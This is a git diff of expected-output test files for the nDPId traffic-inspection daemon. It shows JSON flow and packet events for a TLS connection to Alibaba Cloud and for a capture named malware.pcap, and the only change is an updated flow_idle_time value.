-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609756181300,"flow_last_seen":1609756181300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609756181300,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609756181300,"flow_last_seen":1609756181300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609756181300,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","packets-captured":47,"packets-processed":47,"total-skipped-flows":0,"total-l4-data-len":12100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1609756183162} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 47/47 diff --git a/test/results/malware.pcap.out b/test/results/malware.pcap.out index a47559c78..bd1a167e0 100644 --- a/test/results/malware.pcap.out +++ b/test/results/malware.pcap.out @@ -8,25 +8,25 @@ 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569571470672,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569571470672,"pkt":"CGoKOl4eMFLLbJwbCABFAABU4M1AAEABCcTAqAcHkIv33AgApMYAAQABjsKNXQAAAABuRAoAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":196,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1569579408876} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 